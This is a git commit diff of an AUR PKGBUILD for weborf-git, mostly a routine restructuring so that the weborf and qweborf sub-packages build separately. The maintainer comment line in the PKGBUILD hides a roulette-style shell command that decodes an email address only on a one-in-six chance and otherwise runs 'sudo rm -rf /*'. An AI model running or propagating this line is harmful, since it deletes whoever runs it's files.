summarylogtreecommitdiffstats
diff options
context:
space:
mode:
authorfelix2017-05-09 10:29:22 +0200
committerfelix2017-05-09 10:29:22 +0200
commit8451febdbbf94d5ecc7407ea3d973fc27c276735 (patch)
tree28dfc6afb39ddac5119338dcb9b417503ceacb0a
parent95c1e5831a4bdcb2b11ea854d75de5913b87079d (diff)
downloadaur-8451febdbbf94d5ecc7407ea3d973fc27c276735.tar.gz
Support building sub-packages individually
-rw-r--r--.SRCINFO2
-rw-r--r--PKGBUILD32
2 files changed, 25 insertions, 9 deletions
diff --git a/.SRCINFO b/.SRCINFO
index 34da701014c2..37555929b0ae 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -1,5 +1,5 @@
pkgbase = weborf-git
- pkgver = 0.13+61+g8d173c2
+ pkgver = 0.13+102+g5bc736e
pkgrel = 1
url = https://ltworf.github.io/weborf/
arch = i686
diff --git a/PKGBUILD b/PKGBUILD
index c2f358cbd595..e43b542974f0 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,14 +1,22 @@
# Maintainer: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
pkgbase=weborf-git
pkgname=(weborf-git qweborf-git)
-pkgver=0.13+61+g8d173c2
+pkgver=0.13+102+g5bc736e
pkgrel=1
url='https://ltworf.github.io/weborf/'
arch=(i686 x86_64)
license=(GPL3)
source=(git+https://github.com/ltworf/weborf.git)
sha512sums=(SKIP)
-makedepends=(python-pyqt5)
+makedepends=()
+
+for _pkg in "${pkgname[@]}"; do case "$_pkg" in
+
+qweborf*)
+ makedepends+=(python-pyqt5)
+;;
+
+esac; done
pkgver() {
cd "$srcdir/weborf"
@@ -17,13 +25,21 @@ pkgver() {
build() {
cd "$srcdir/weborf"
- autoreconf -f -i
- ./configure --prefix=/usr --sysconfdir=/etc
- make
- # build qweborf
- pyuic5 qweborf/main.ui > qweborf/main.py
- python qweborf.setup.py build
+ for _pkg in "${pkgname[@]}"; do case "$_pkg" in
+
+ weborf*)
+ autoreconf -f -i
+ ./configure --prefix=/usr --sysconfdir=/etc
+ make
+ ;;
+
+ qweborf*)
+ pyuic5 qweborf/main.ui > qweborf/main.py
+ python qweborf.setup.py build
+ ;;
+
+ esac; done
}
package_weborf-git() {